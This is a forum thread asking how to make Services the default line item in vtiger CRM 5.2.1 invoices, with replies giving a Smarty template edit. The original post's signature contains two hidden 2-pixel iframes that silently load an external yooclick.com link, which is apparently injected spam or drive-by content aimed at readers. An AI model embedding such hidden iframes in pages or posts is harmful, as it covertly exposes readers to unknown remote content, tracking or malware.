Invoice - Services as Default

Hello Everyone,

I would like to ask where will i configure to make the Services not the Products is the default in Item Details under Invoice Module..

Any help would be great..

Kind Regards,
`AKE <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

Comments

• 5 Comments sorted by Votes Date Added
  • the link posted did not work, the services picklist became available but selected item from the picklist, would not fill the invoice field(field left blank after selection). using 5.2.1
  • i got mine to work by replacing code in smarty/templates/inventory/productdetails.tpl

&lt;td class=&quot;small&quot;&gt;
    	&lt;input type=&quot;text&quot; id=&quot;productname1&quot; name=&quot;productname1&quot; class=&quot;small&quot; style=&quot;width&#58;70%&quot; value=&quot;{$product_name}&quot; readonly /&gt;
    	&lt;input type=&quot;hidden&quot; id=&quot;hdnproductid1&quot; name=&quot;hdnproductid1&quot; value=&quot;{$product_id}&quot; /&gt;
    	&lt;input type=&quot;hidden&quot; id=&quot;lineitemtype1&quot; name=&quot;lineitemtype1&quot; value=&quot;products&quot; /&gt;
    	&amp;nbsp;&lt;img id=&quot;searchicon1&quot; title=&quot;products&quot; src=&quot;{'products&#46;gif'|@vtiger_imageurl&#58;$theme}&quot; style=&quot;cursor&#58; pointer;&quot; align=&quot;absmiddle&quot; onclick=&quot;productpicklist(this,'{$module}',1)&quot; /&gt;
    &lt;/td&gt;

with
    &lt;td class=&quot;small&quot; id=&quot;viewproductcode&quot;&gt;
    	&lt;input id=&quot;hdnproductcode1&quot; name=&quot;hdnproductcode1&quot; class=&quot;small&quot; style=&quot;width&#58; 98%;&quot; value=&quot;&quot; readonly=&quot;readonly&quot; type=&quot;text&quot; /&gt;
    &lt;/td&gt;
     &lt;/tr&gt;
      &lt;tr&gt;
    &lt;td class=&quot;small&quot;&gt;
    	&lt;input id=&quot;productname1&quot; name=&quot;productname1&quot; class=&quot;small&quot; style=&quot;width&#58; 70%;&quot; value=&quot;&quot; readonly=&quot;readonly&quot; /&gt;
    	&lt;input type=&quot;hidden&quot; id=&quot;hdnproductid1&quot; name=&quot;hdnproductid1&quot; value=&quot;&quot; /&gt;
    	&lt;input type=&quot;hidden&quot; id=&quot;lineitemtype1&quot; name=&quot;lineitemtype1&quot; value=&quot;services&quot; /&gt;
    	&amp;nbsp;&lt;img id=&quot;searchicon1&quot; title=&quot;services&quot; src=&quot;{'services&#46;gif'|@vtiger_imageurl&#58;$theme}&quot; style=&quot;cursor&#58; pointer;&quot; align=&quot;absmiddle&quot; onclick=&quot;servicepicklist(this,'{$module}',1)&quot; /&gt;
    &lt;/td&gt;

or you could upload my patch attached to the root of your vtiger installation,
    i am not a seasoned programmer so all advice given here is from a novice perspective and you install at your own risk
  • the above is for vtiger 5.2.1